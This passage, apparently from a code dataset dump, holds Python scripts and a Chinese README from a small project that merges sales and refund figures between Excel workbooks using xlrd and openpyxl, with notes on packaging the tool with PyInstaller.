Type = \" + _refundTable.name + \"\\tPlatform: \" + _platform, \"We can not identify the chinese as platform name\"))\n continue\n else:\n _refundInfoInstance = refundInfo(_platform)\n\n _row = re + 1 if _refundTable.cell_value(re,cs) == \"账号\" else re\n while True:\n _acclo = _refundTable.cell_value(_row,cs)\n\n if _acclo == \"\":\n break\n else:\n # split the account and location\n if '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n elif '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n else:\n _acclo = _acclo.strip()\n _accloList = _acclo.split(\" \",1)\n _account = _accloList[0].strip()\n\n # set the default value\n if len(_accloList) == 1:\n _location = \"CN\"\n else:\n _location = _accloList[1].strip()\n \n # read the refund\n _refund = _refundTable.cell_value(_row,cs+1)\n \n _refundInfoInstance.add(_account, _location, _refund)\n \n # add 1 to row\n _row += 1\n \n # add to the list\n _refundInfoList.append(_refundInfoInstance)\n\n return _refundInfoList\n\ndef setRefundInfo(_infoType, _refundInfoList):\n # if can not find correct type, return\n if _infoType not in summary.sheetnames:\n errorList.append(error(\"REFUND ERROR\",\"can not find correct sheet: \" + _infoType))\n return \n _refundTable = summary[_infoType]\n\n for _refundInstance in _refundInfoList:\n _index, _offset = findPlatformIndex(_refundTable, _refundInstance.platform)\n \n # if can not find platform, send error\n if _index == -1:\n errorList.append(error(\"REFUND ERROR\",\"can not find correct platform: \" + _refundInstance.platform))\n continue\n \n # create the dictionary \n accountDict = {}\n for _row in range(_index, _index + _offset):\n _account = _refundTable[\"D\" + str(_row)].value.strip()\n _locationList = _refundTable[\"F\" + str(_row)].value.split(' ')\n _location = _locationList[1].strip() if len(_locationList) > 1 else _locationList[0].strip()\n\n # add to the dict\n accountDict[_account + '_' + _location] = _row\n\n # process the refund\n for _refundIndex in range(0, _refundInstance.length):\n _refundAccount, _refundLocation, _refund = _refundInstance.get(_refundIndex)\n\n if _refundAccount + '_' + _refundLocation in accountDict:\n _refundTable[\"I\" + str(accountDict[_refundAccount + '_' + _refundLocation])].value = _refund\n else:\n processRefundNotFound(_infoType, _refundInstance.platform, _refundAccount, _refundLocation, _refund)\n\n return\n\ndef processRefundInfo(_filePath):\n _refundBook = open_workbook(_filePath,formatting_info=True)\n _refundSheets = _refundBook.sheets()\n\n\n for _refundsheet in _refundSheets:\n _infoType = _refundsheet.name\n\n print(\"正在处理 \" + _refundsheet.name + \" 退款金额...\\r\")\n\n _refundInfoList = getRefundInfo(_refundsheet)\n setRefundInfo(_infoType, _refundInfoList)\n\n\n return\n\n\ndef getInfoByXlrd(filePath):\n # open the file\n data = open_workbook(filePath)\n\n # to store this file data which _platform and type is\n _platform = data.sheet_by_index(0).cell_value(1,0).split('/')[0]\n _infoType = data.sheet_by_index(0).cell_value(1,1).split('/',2)[1]\n\n # use info list to temporary store data \n _infoList = []\n\n # for each table to process data\n sheets = data.sheets()\n for table in sheets:\n # ignore the sheet of \"原始\"\n if table.name == \"原始\":\n continue\n\n _row = 1\n nrow = table.nrows\n\n # for each module to find out useful info\n while _row < nrow:\n # if find the none 
row, add 1 to row for finding the next\n if table.cell(_row,1).value == \"\":\n _row += 1\n continue\n\n # if account is none, the wo think the line is bad\n row_3List = table.cell(_row,2).value.split('/')\n if row_3List[0] == \"\" or is_contains_chinese(row_3List[0]):\n _row += 1\n continue\n\n # create the module info instance\n _infoInstance = info()\n\n # to process the account/location cell\n _infoInstance.account = row_3List[0]\n _infoInstance.location = row_3List[1] if not is_contains_chinese(row_3List[1]) else row_3List[1][0:-1]\n\n # if cell has no name, then wo think this line is bad \n _nameInTable = table.cell(_row,1).value.split('/',2)\n _infoInstance.name = \"/\" if _nameInTable[0] == \"\" else _nameInTable[0]\n if _infoType == \"类\": _infoType = _nameInTable[1]\n \n # to judge this module is normal or not\n row_4 = table.cell(_row,3).value\n if row_4 == \"\":\n _infoInstance.normal = False\n _infoInstance.salesAmount = table.cell(_row,4).value\n else :\n _infoInstance.salesAmount = row_4\n _infoInstance.profitRate = table.cell(_row+1,4).value\n\n # append the module instance into the list\n _infoList.append(_infoInstance)\n\n # add 3 to variable _row to move to next module \n _row += 2\n\n data.release_resources()\n if _infoType == \"C类\" : _infoType += (\"打底裤\")\n return _platform, _infoType, _infoList\n\n\ndef openReport(_reportPath):\n print(\"正在读取汇总文件\\r\")\n try:\n _summary = load_workbook(_reportPath)\n except Exception as e:\n print(\"读取汇总文件发生错误,可能汇总文件已被打开,请关闭文件后重试!!\")\n print(\"Unexpected Error: {}\".format(e))\n else: \n print(\"汇总文件读取成功:\" + _reportPath + \"\\n\")\n\n return _summary\n\ndef initNotFoundTable():\n notfoundTable[\"A1\"] = \"类型\"\n notfoundTable[\"B1\"] = \"渠道\"\n notfoundTable[\"C1\"] = \"账号\"\n notfoundTable[\"D1\"] = \"姓名\"\n notfoundTable[\"E1\"] = \"姓名/仓\"\n notfoundTable[\"F1\"] = \"销售额\"\n notfoundTable[\"G1\"] = \"利润率\"\n notfoundTable[\"H1\"] = \"退款金额\"\n notfoundTable[\"I1\"] = \"毛利\"\n\ndef save(_fileName):\n print(\"\\n正在保存文件\")\n _fileName = \"output\" if _fileName == \"\" else _fileName\n\n try:\n summary.save(path + \"/\" + _fileName + \".xlsx\")\n notfound.save(path + \"/notfound.xlsx\")\n\n except Exception as e:\n errorList.append(error(path + '/' + _fileName + \".xlsx\", \"Unexpected Error: {}\".format(e)))\n print(\"文件保存失败,请检查 \" + _fileName + \".xlsx 或 notfound.xlsx 是否在打开状态。请关闭文件后重试!!!\")\n print(\"Unexpected Error: {}\".format(e))\n\n else:\n print(\"保存文件成功,路径:\" + path + \"/\" + _fileName + \".xlsx\") \n\n# --------------------------------------------------------------------------------------------- #\n# main function #\n# --------------------------------------------------------------------------------------------- #\n\n\n#文件夹目录\npath = \"../data/\"\n#得到文件夹下的所有文件名称\nfiles= listdir(path) \n\n# mark the message throught the process\nerrorList = []\ncorrectCount = 0\nfailCount = 0\n\n# open report to write down\nreportPath = getReportPath(path, files)\nrefundPath = getReportPath(path, files, _onlyXlsx = False)\nnotfound = Workbook()\nnotfoundTable = notfound.active\ninitNotFoundTable()\n\nif reportPath is not None:\n # open the report\n summary = openReport(reportPath)\n processRefundInfo(refundPath)\n\n# init notfound table\n\n\nsave(\"output\")\n \n# pause the os in case disappear\nsystem(\"pause\")\n\n \n \n \n\n "
},
{
"alpha_fraction": 0.7123287916183472,
"alphanum_fraction": 0.7162426710128784,
"avg_line_length": 20.33333396911621,
"blob_id": "b745a991837906529b650756a3b44637ec38bfc0",
"content_id": "388e5880d55dbca19e6210cea05fc5821a8e87e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 757,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/src/main.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "import command\nimport guide\nfrom log import Logger\nfrom error import ErrorList\nfrom os import system\n\n\nprint(\"欢迎使用6.0版本的本系统了(连名字都没有,哎呀我去\")\nprint(\"有不懂不要问,去命令行模式输入 do -help \")\nprint(\"汇总文件仅支持“.xlsx“格式, 退款文件仅支持”.xls“格式,出错了检查一下是不是这个问题\\n\")\n\nmode = input(\"输入点东西就进入命令行模式,啥也不输就进入引导模式:\")\n\nif mode == \"\":\n Logger.addLog(\"输入:{},进入引导模式。\".format(mode))\n guide.doGuide(\"../data\")\nelse:\n Logger.addLog(\"输入:{},进入命令模式。\".format(mode))\n command.doCommand()\n\n\nErrorList.printErrorList()\nLogger.writeLog()\nsystem(\"pause\")"
},
{
"alpha_fraction": 0.5059764981269836,
"alphanum_fraction": 0.5115293860435486,
"avg_line_length": 39.704978942871094,
"blob_id": "2566bac93374ea69370e015e9b4de43fd0a3006a",
"content_id": "bdec5c33d1c19aab662e0879744706e7bcd03aac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10833,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 261,
"path": "/src/saleAmount.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import processException, ErrorList, Error,Warning, NotFound\nfrom log import Logger\nimport utils\nimport xlsutils\nfrom datetime import datetime\nfrom os import path as osPath\nfrom os import listdir,system\nfrom xlrd import open_workbook\n\n\nclass info:\n def __init__(self):\n self.account = \"undefined\"\n self.name = \"undefined\"\n self.location = \"undefined\"\n self.salesAmount = 0.0\n self.profitRate = 0.0\n self.normal = True # to mark the cell is nornal or not \n\n\nclass SaleAmount: \n\n def __init__(self, _summary, _notfoundTable):\n self.__summary = _summary\n self.__notfoundTable = _notfoundTable\n self.__correctCount = 0\n self.__failCount = 0\n\n\n def processInfoWithTime(self,_lastpath):\n print(\"正在处理文件:\" + _lastpath)\n _startTime = datetime.now()\n\n try:\n _platform, _infoType, _infoList = self.__getInfoByXlrd(_lastpath)\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"\\r文件已读取完成,用时 \" + str(_interval) + \" 秒\")\n\n # ignore writing when info list is none\n if _infoList == []:\n ErrorList.addError(Warning(_lastpath, \"读取数据为空,注意检查\"))\n print(\"读取数据为空,已跳过写入!!\")\n return \n\n _startTime = datetime.now()\n self.__setInfo(_platform, _infoType, _infoList, _lastpath)\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"数据已处理完成,用时 \" + str(_interval) + \" 秒\\n\")\n\n except Exception:\n processException()\n\n\n def processDir(self, _filepath):\n files = listdir(_filepath) \n for file in files: \n filePath = _filepath + '/' + file\n if osPath.isdir(filePath): \n self.processSecondLevelDir(filePath)\n\n\n def processSecondLevelDir(self, _filepath):\n _files = listdir(_filepath) \n\n for _file in _files:\n _lastpath = _filepath + '/' + _file\n\n #判断是否是文件夹\n if osPath.isdir(_lastpath): \n # 递归搜索\n self.processSecondLevelDir(_lastpath)\n else:\n # to process each file\n \n # ignore the files which not .xlsx or .xls file\n if not (\".xls\" in _file):\n continue\n else:\n # ignore the temporary files\n if \"~$\" in _file:\n ErrorList.addError(Warning(_lastpath, \"find \\'~$\\' in the file name, do use \\'~$\\' for file name in case we see it as temporary files\"))\n continue\n \n Logger.addPrefabLog(Logger.LOG_TYPE_DO,_lastpath)\n self.processInfoWithTime(_lastpath)\n \n\n\n def __getInfoByXlrd(self, filePath):\n try:\n # open the file\n data = open_workbook(filePath)\n\n # to store this file data which _platform and type is\n _platform = data.sheet_by_index(0).cell_value(1,0).split('/')[0]\n _infoType = data.sheet_by_index(0).cell_value(1,1).split('/',2)[1]\n\n # use info list to temporary store data \n _infoList = []\n\n # for each table to process data\n sheets = data.sheets()\n for table in sheets:\n # ignore the sheet of \"原始\"\n if table.name == \"原始\":\n continue\n\n _row = 1\n nrow = table.nrows\n\n # for each module to find out useful info\n while _row < nrow:\n # if find the none row, add 1 to row for finding the next\n if table.cell(_row,1).value == \"\":\n _row += 1\n continue\n\n # if account is none, the wo think the line is bad\n row_3List = table.cell(_row,2).value.split('/')\n if row_3List[0] == \"\" or utils.is_contains_chinese(row_3List[0]):\n _row += 1\n continue\n\n # create the module info instance\n _infoInstance = info()\n\n # to process the account/location cell\n _infoInstance.account = row_3List[0]\n _infoInstance.location = row_3List[1] if not utils.is_contains_chinese(row_3List[1]) else row_3List[1][0:-1]\n\n # if cell has no name, then wo think this line is bad \n 
_nameInTable = table.cell(_row,1).value.split('/',2)\n _infoInstance.name = \"/\" if _nameInTable[0] == \"\" else _nameInTable[0]\n if _infoType == \"类\": _infoType = _nameInTable[1]\n \n # to judge this module is normal or not\n row_4 = table.cell(_row,3).value\n if row_4 == \"\":\n _infoInstance.normal = False\n _infoInstance.salesAmount = table.cell(_row,4).value\n else :\n _infoInstance.salesAmount = row_4\n _infoInstance.profitRate = table.cell(_row+1,4).value\n\n # append the module instance into the list\n _infoList.append(_infoInstance)\n\n # add 3 to variable _row to move to next module \n _row += 2\n\n data.release_resources()\n\n except Exception:\n processException()\n return \"\", \"\", []\n else :\n return _platform, _infoType, _infoList\n\n\n def __processNotFoundInfo(self, _platform, _infoType, _infoInstance):\n _row = self.__notfoundTable.max_row + 1\n self.__notfoundTable[\"A\" + str(_row)] = _infoType\n self.__notfoundTable[\"B\" + str(_row)] = _platform\n self.__notfoundTable[\"C\" + str(_row)] = _infoInstance.account\n self.__notfoundTable[\"D\" + str(_row)] = _infoInstance.name\n self.__notfoundTable[\"E\" + str(_row)] = _infoInstance.name + \" \" + _infoInstance.location\n # to judge the normal is true or not\n if _infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n self.__notfoundTable[\"F\" + str(_row)].value = _infoInstance.salesAmount\n self.__notfoundTable[\"G\" + str(_row)].value = _infoInstance.profitRate\n else :\n # else write down the margin \n self.__notfoundTable[\"I\" + str(_row)].value = _infoInstance.salesAmount\n \n\n def __setInfo(self, _platform, _infoType, _infoList, _path):\n try:\n # find the infotype table\n if _infoType not in self.__summary.sheetnames:\n ErrorList.addError(Error(_path,\"can not find correct sheet: \" + _infoType))\n return \n reportTable = self.__summary[_infoType]\n\n # to find the index of platform\n index, offset = utils.findPlatformIndex(reportTable, _platform)\n if index == -1:\n ErrorList.addError(Error(_path, \"can not find correct platform: \" + _platform))\n return\n\n # for each data in infoList to write down in the report\n for infoInstance in _infoList:\n isFind = False # to mark the account is finded or not\n\n for row in range(index, index + offset):\n reportAccount = reportTable[\"D\" + str(row)].value\n reportLocationList = reportTable[\"F\" + str(row)].value.split(' ')\n reportLocation = reportLocationList[1] if len(reportLocationList) > 1 else reportLocationList[0]\n\n # to match corret account and location row\n if infoInstance.account == reportAccount and infoInstance.location == reportLocation :\n isFind = True\n self.__correctCount += 1\n\n # if the name is wrong, then change the name \n reportName = reportTable[\"E\" + str(row)].value\n if infoInstance.name != reportName : \n reportTable[\"E\" + str(row)].value = infoInstance.name\n reportTable[\"F\" + str(row)].value = infoInstance.name + \" \" + infoInstance.location\n\n # to judge the normal is true or not\n if infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n reportTable[\"G\" + str(row)].value = infoInstance.salesAmount\n reportTable[\"H\" + str(row)].value = infoInstance.profitRate\n else :\n # else write down the margin \n reportTable[\"J\" + str(row)].value = infoInstance.salesAmount\n\n # write down and break the for loop\n break\n\n if isFind:\n continue\n else:\n # insert a new row\n xlsutils.insert_rows(reportTable, index + offset + 1, True)\n offset += 1\n\n # write the 
data\n row = index + offset\n reportTable[\"B\" + str(row)].value = _infoType\n reportTable[\"D\" + str(row)].value = infoInstance.account\n reportTable[\"E\" + str(row)].value = infoInstance.name\n reportTable[\"F\" + str(row)].value = infoInstance.name + \" \" + infoInstance.location\n if infoInstance.normal :\n reportTable[\"G\" + str(row)].value = infoInstance.salesAmount\n reportTable[\"H\" + str(row)].value = infoInstance.profitRate\n else :\n reportTable[\"J\" + str(row)].value = infoInstance.salesAmount\n\n # set red color\n xlsutils.setColor(reportTable[\"D\" + str(row)], \"red\")\n\n self.__failCount += 1\n Logger.addLog(\"新增插入一行,插入时行号 {},账号 {}\".format(row, infoInstance.account))\n ErrorList.addError(NotFound(_path, \"存在新增数据,请自行插入,数据已录入 notfound.xlsx\"))\n self.__processNotFoundInfo(_platform, _infoType, infoInstance)\n\n \n except Exception:\n processException()\n\n \n def getFailCount(self):\n return self.__failCount\n\n def getCorrectCount(self):\n return self.__correctCount\n\n"
},
{
"alpha_fraction": 0.590298056602478,
"alphanum_fraction": 0.5929281115531921,
"avg_line_length": 25.734375,
"blob_id": "39c531a305098a0f0982f353dbd1d29b295f4c04",
"content_id": "1fe78d53876ec42a2ba30ef62a0daf5b09133c48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3542,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 128,
"path": "/src/error.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "import sys\nimport linecache\nfrom log import Logger\nfrom os import system\n\n\nclass ErrorList:\n __errorList = []\n __warningList = []\n __notFoundList = []\n\n @classmethod\n def printErrorList(ErrorList):\n if len(ErrorList.__errorList) != 0 :\n print(\"\\n操作过程有以下错误:\")\n else:\n print(\"\\n恭喜!!操作过程无错误\")\n for _error in ErrorList.__errorList:\n _error.printInfo()\n\n if len(ErrorList.__warningList) != 0 :\n print(\"\\n操作过程有以下警告:\")\n else:\n print(\"\\n恭喜!!操作过程无警告\")\n for _warning in ErrorList.__warningList:\n _warning.printInfo()\n\n if len(ErrorList.__notFoundList) != 0 : print(\"\\n存在新增数据,请自行插入,数据已录入 notfound.xlsx\")\n for _notfound in ErrorList.__notFoundList:\n _notfound.printInfo()\n \n\n @classmethod\n def addError(ErrorList, _error):\n Logger.addLog(_error.toString())\n if type(_error) == Error:\n ErrorList.__errorList.append(_error)\n\n elif type(_error) == Warning:\n ErrorList.__warningList.append(_error)\n\n elif type(_error) == NotFound:\n ErrorList.__notFoundList.append(_error)\n \n @classmethod\n def getErrorCount(ErrorList):\n return len(ErrorList.__errorList)\n\n @classmethod\n def getWarningCount(ErrorList):\n return len(ErrorList.__warningList) + (1 if len(ErrorList.__notFoundList) > 0 else 0)\n\n\nclass ErrorBase:\n TYPE_ERROR = 1\n TYPE_WARNING = 2\n TYPE_NOTFOUND = 3\n\n def __init__(self,_path,_message):\n self.path = _path\n self.message = _message\n\n def printInfo(self):\n pass\n\n def toString(self):\n pass\n\n\nclass Error(ErrorBase):\n def __init__(self,_path,_message):\n self.errorType = ErrorBase.TYPE_ERROR\n ErrorBase.__init__(self, _path, _message)\n\n\n def printInfo(self):\n print(\"ERROR: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n\n def toString(self):\n string = \"ERROR: Massage: {}\\t Path:{}\".format(self.message, self.path)\n return string\n\n\nclass Warning(ErrorBase):\n def __init__(self,_path,_message):\n self.errorType = ErrorBase.TYPE_WARNING\n ErrorBase.__init__(self, _path, _message)\n\n def printInfo(self):\n print(\"Warning: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n\n def toString(self):\n string = \"WARNING: Massage: {}\\t Path:{}\".format(self.message, self.path)\n return string\n\n\nclass NotFound(ErrorBase):\n def __init__(self,_path,_message):\n self.errorType = ErrorBase.TYPE_NOTFOUND\n ErrorBase.__init__(self, _path, _message)\n\n def printInfo(self):\n print(\"PATH: \" + self.path)\n \n def toString(self):\n string = \"NOTFOUND: Massage: {}\\t Path:{}\".format(self.message, self.path)\n return string\n\n\ndef processException():\n exc_type, exc_obj, tb = sys.exc_info()\n f = tb.tb_frame\n lineno = tb.tb_lineno\n filename = f.f_code.co_filename\n linecache.checkcache(filename)\n line = linecache.getline(filename, lineno, f.f_globals)\n\n # send error\n ErrorList.addError(Error(filename,'APPLICATION EXCEPTION (LINE {} \"{}\"): {}'.format(lineno, line.strip(), exc_obj)))\n print('APPLICATION EXCEPTION ({} LINE {} \"{}\"): {}'.format(filename, lineno, line.strip(), exc_obj))\n\n Logger.writeLog()\n\n # stop the system and exit\n system(\"pause\")\n exit() "
},
{
"alpha_fraction": 0.6317105889320374,
"alphanum_fraction": 0.6488829851150513,
"avg_line_length": 23.481632232666016,
"blob_id": "6021a0d75dd5db415e2f6d95c924787c3868e0c3",
"content_id": "03ed9becf7b7b6c18d50216d186eb7290ff5a5c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9606,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 245,
"path": "/README.md",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "# PythonDoExcel\n\n利用Python的OpenXlPy库对Excel表格进行处理\n\n> 这个程序就是一个python小白的糊弄之作啊。由于有一天我姐突然找我干excel枯燥烦闷的复制粘贴操作。做完一想,消灭这些无聊的操作不就是程序员存在的意义嘛。所以用python开干了,虽然自己就没写过python,但看网上python操作excel还不错。\n\n## 1、环境准备\n\n> 听信了网上的建议,我还是使用了anaconda软件来管理我的python环境。最后感觉还是挺舒心的。可以再软件可视化的看见自己的已安装的包。\n \n> 项目用到的库基本在python的自带的库中,包括xlrd, openpyxl\n \n> 但打包时使用pipenv进行创建虚拟环境,并使用pyinstaller来对python脚本打包成EXE文件。\n \n> 这里还是提醒一下,注意一下要用这个程序的人的电脑是32位还是64位的,来选择一下使用python的版本。一开始我没注意,使用64位的python打包了exe,在我姐32位的电脑不兼容。最后32位和64位python环境共存也没搞好,就直接把64位卸载重装32位的了,难受。(有人会告诉我一声!!!\n\n#### \n\n## 2、xlrd操作\n\n> 看了晚上的一堆建议,然后一开始使用了`openpyxl`作为`excel`文件的读取和写入数据的库。但是后面写完才发现有点坑这个`openpyxl`,读取实在是有点慢,我一个行数不多,只有三十来K的文件,竟然在调试环境读取了一分多钟,运行环境也用了四十多秒。最后实在忍不了,投入`xlrd`的怀抱。\n> \n> `xlrd`读得快,但可能内存消耗多一点,我没有仔细的比较。`openpyxl`读取较慢可能和我使用`cell`函数较多有关,导致`xml`文件多次解析。另外,`xlrd`还支持 `.xls` 和 `.xlsx` 文件,`openpyxl`仅支持`.xlsx`文件。\n\n##### \n\n- 工作表\n \n ```python\n wb = open_workbook(filePath) # 打开工作表\n wb.close() # 关闭工作表\n ```\n\n- `sheet`操作\n \n ```python\n table = data.sheets()[0] # 通过索引顺序获取\n \n table = data.sheet_by_index(sheet_indx)) # 通过索引顺序获取\n \n table = data.sheet_by_name(sheet_name) # 通过名称获取\n \n names = data.sheet_names() # 返回book中所有工作表的名字\n \n data.sheet_loaded(sheet_name or indx) # 检查某个sheet是否导入完毕\n ```\n\n- `sheet`的行操作\n \n ```python\n nrows = table.nrows # 获取该sheet中的有效行数\n \n table.row(rowx) # 返回由该行中所有的单元格对象组成的列表\n \n table.row_slice(rowx) # 返回由该列中所有的单元格对象组成的列表\n \n table.row_types(rowx, start_colx=0, end_colx=None) # 返回由该行中所有单元格的数据类型组成的列表\n \n table.row_values(rowx, start_colx=0, end_colx=None) # 返回由该行中所有单元格的数据组成的列表\n \n table.row_len(rowx) # 返回该列的有效单元格长度\n ```\n\n- `sheet`的列操作\n \n ```python\n ncols = table.ncols # 获取列表的有效列数\n \n table.col(colx, start_rowx=0, end_rowx=None) # 返回由该列中所有的单元格对象组成的列表\n \n table.col_slice(colx, start_rowx=0, end_rowx=None) # 返回由该列中所有的单元格对象组成的列表\n \n table.col_types(colx, start_rowx=0, end_rowx=None) # 返回由该列中所有单元格的数据类型组成的列表\n \n table.col_values(colx, start_rowx=0, end_rowx=None) # 返回由该列中所有单元格的数据组成的列表\n ```\n\n- `sheet`单元格操作\n \n ```python\n table.cell(row,col) # 返回对应的单元格对象\n table.cell_value(row,col) # 返回对应单元格对象的值\n ```\n\n- `sheet`获取合并表格\n \n > 这个地方还是有个坑的吧,如果你在打开表格的时候不把formatting_info属性设为True的话,是获取不到合并单元格的信息的\n \n ```python\n _refundTable.merged_cells # 获取合并单元格的列表\n rs, re, cs, ce = merge # 开始行结束行,开始列结束列信息\n ```\n\n### \n\n## 3、openpyxl操作\n\n> `xlrd`和`openpyxl`的操作还是有一定的相似的。但**有一个比较明显的不同之处就是`xlrd`的行和列是由0开始的,而`openpyxl`的行和列是由1开始的。**另外,`openpyxl`也支持使用(如`A1`)这类写法。 \n> \n> 还有就是,当遇到没有内容的单元格时,`xlrd`返回的是`“”`,而`openpyxl`返回的是`none`。如果`openpyxl`在打开时不选择`dataonly = True`的模式,`openpyxl`单元格如果为公式,则会返回公式而非值。\n> \n> 这里使用`openpyxl`库作为`excel`的写入库,还是觉得他比`xlutils`和 `xlwriter`要方便挺多的。另外,在写入模式下,`openpyxl`的性能也没有他在读入模式下的那么逊色,一番操作后只需一个save`函数`即可。\n> \n> [参考博客](https://juejin.im/post/5cae014c6fb9a0686c0186df#heading-7)\n\n##### \n\n- 打开工作表\n \n ```python\n wb = load_workbook(_reportPath) # 打开工作表\n \n wb = workbook() # 创建新的工作表\n table = wb.active() # 激活默认的sheet\n \n ws1 = wb.create_sheet() #默认插在工作簿末尾\n \n ws2 = wb.create_sheet(0) # 插入在工作簿的第一个位置\n ws.title = \"New Title\" # 修改sheet的title\n ```\n\n- sheet操作\n \n ```python\n wb.get_sheet_names() # 获取所有sheet的name\n \n wb[\"New Title\"] # 获取名字为那个的sheet\n wb.get_sheet_by_name(\"New Title\") # 和上面一样,但官方似乎不建议用这种方法了\n \n wb.remove(ws1) #删除sheet\n ```\n\n- sheet行操作\n \n ```python\n table.max_row # 获取最大有效行数\n table.max_col # 获取最大有效列数\n ```\n\n- 单元格操作\n \n ```python\n cell = ws['A4'] # 获取第4行第A列的单元格\n \n ws['A4'] = 4 # 给第4行第A列的单元格赋值为4\n \n ws.cell(row=4, column=2, value=10) # 给第4行第2列的单元格赋值为10\n ws.cell(4, 2, 10) # 
同上\n ```\n\n##### \n\n## 4、打包exe\n\n- #### 使用anaconda环境打包\n \n > 不太推荐在此环境下进行exe的打包。因为anaconda会将很多无关的库依赖链接进入程序,导致最后的exe文件高达几百兆的大小,极其吓人,还会在打包的过程中引发错误。但自己在这条路上遇到了一点问题,还是简单记录一下。\n \n 1. ##### 使用pip安装pyinstaller\n \n ```python\n pip install pyinstaller\n ```\n \n 2. ##### 安装完成后,使用pyinstaller命令\n \n ```python\n # @filePath 打包的python文件的路径\n # @iconPath 打包的icon的文件路径,可选\n pyinstaller -F filePath -i iconPath\n ```\n \n 还有一堆的pyinstaller的命令,建议还是百度一下吧,就不列出来了。\n \n 3. ##### 遇到一点报错了\n \n - ###### 错误一:installer maximum recursion depth exceeded\n \n 超过最大的递归深度。这很可能是由于anaconda的库依赖太过复杂导致的。因为我在使用虚拟环境打包是就没这个错误。\n \n 解决方法:打开生成的.spec文件,在文件开头添加\n \n ```python\n import sys\n sys.setrecursionlimit(1000000)\n ```\n \n .继续执行打包,但是改文件名:pyinstaller -F XXX.spec ,执行该文件。\n \n - ###### 错误二:**UnicodeDecodeError: 'utf-8' codec can't decode byte 0xce in position 110: invalid continuation byte**\n \n 修改D:\\Python34\\Lib\\site-packages\\PyInstaller\\compat.py文件中[参考](https://stackoverflow.com/questions/47692960/error-when-using-pyinstaller-unicodedecodeerror-utf-8-codec-cant-decode-byt)\n \n ```python\n out = out.decode(encoding)\n 为\n out = out.decode(encoding, errors='ignore')\n 或\n out = out.decode(encoding, \"replace\")\n ```\n \n - ###### 错误三:pyinstaller module 'win32ctypes.pywin32.win32api' has no attribute 'error\n \n - 细看这个错误,似乎是由于icon文件的copy是造成的。\n \n - google一下,发现问题有点难解决,但还是找到了不明原因的解决方案\n \n - 将你的icon文件转换成ico格式的文件,并把文件放到打包目录的根目录下,问题就好了。\n \n - ###### 问题四:pyinstaller unpack requires a buffer of 16 bytes\n \n - 这个问题有点傻,是因为我直接将jpg的icon文件直接改拓展名的方式转换为ico格式文件,pyinstaller无法识别造成的。\n \n - google搜一下在线转ico就好了,一大堆\n \n ##### \n\n- #### 使用pipenv虚拟环境打包\n \n - ###### 安装pipenv\n \n `pip install pipenv`\n \n - ###### 选一个好目录做我们的虚拟环境,然后在该目录下:\n \n `pipenv install --python 3.7`\n \n - ###### 在命令行下激活环境\n \n `pipenv shell`\n \n 输入这个命令,我们就进入到了新建的虚拟环境。如果你这时候使用命令 `pip list` 并发现里面只有很少的库,这就说明我们成功进入虚拟环境了\n \n - ###### 安装依赖的库\n \n ```python\n # 我就用到这几个了,所以就安装了这几个\n pipenv install pyinstaller\n pipenv install openpyxl\n pipenv install xlrd\n ```\n \n - ###### 把你的脚本放到这个目录下面,运行 pyinstaller,方法同前\n \n - ###### 你会发现exe小了太多了,我从三百多兆变成了六兆,你敢信\n"
}
] | 17 |
Michal-D4/filegov | https://github.com/Michal-D4/filegov | b6c2fc0ef2121aab165ea9af6b32f17f27f0645b | 7c9fefcf393b003284ac52b1db2ed6766686054e | 794e99877f71484c730d091cb4378f38c64a610d | refs/heads/master | 2020-05-27T20:16:00.056833 | 2019-07-22T19:33:40 | 2019-07-22T19:33:40 | 188,776,123 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6256983280181885,
"alphanum_fraction": 0.6703910827636719,
"avg_line_length": 20.058822631835938,
"blob_id": "93e623d87485b513758b63caa24383e2c0b36fad",
"content_id": "93a6c213629ad4f36f5f4177fbfa6f6eba1e5be0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 17,
"path": "/pyproject.toml",
"repo_name": "Michal-D4/filegov",
"src_encoding": "UTF-8",
"text": "[tool.poetry]\nname = \"filegov\"\nversion = \"0.1.0\"\ndescription = \"Manage files to easy search with tags, authors etc.\"\nauthors = [\"Michal <[email protected]>\"]\n\n[tool.poetry.dependencies]\npython = \"^3.7\"\n\n[tool.poetry.dev-dependencies]\npytest = \"^3.0\"\npyqt5-tools = \"^5.12\"\nradon = \"^3.0\"\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n"
},
{
"alpha_fraction": 0.7075645923614502,
"alphanum_fraction": 0.7103320956230164,
"avg_line_length": 21.12244987487793,
"blob_id": "920d987b2b8ddc605f4bb0dcd432f5848bace650",
"content_id": "58b54313afff7eab93e006229d9a212b9cc58855",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 49,
"path": "/run_app.py",
"repo_name": "Michal-D4/filegov",
"src_encoding": "UTF-8",
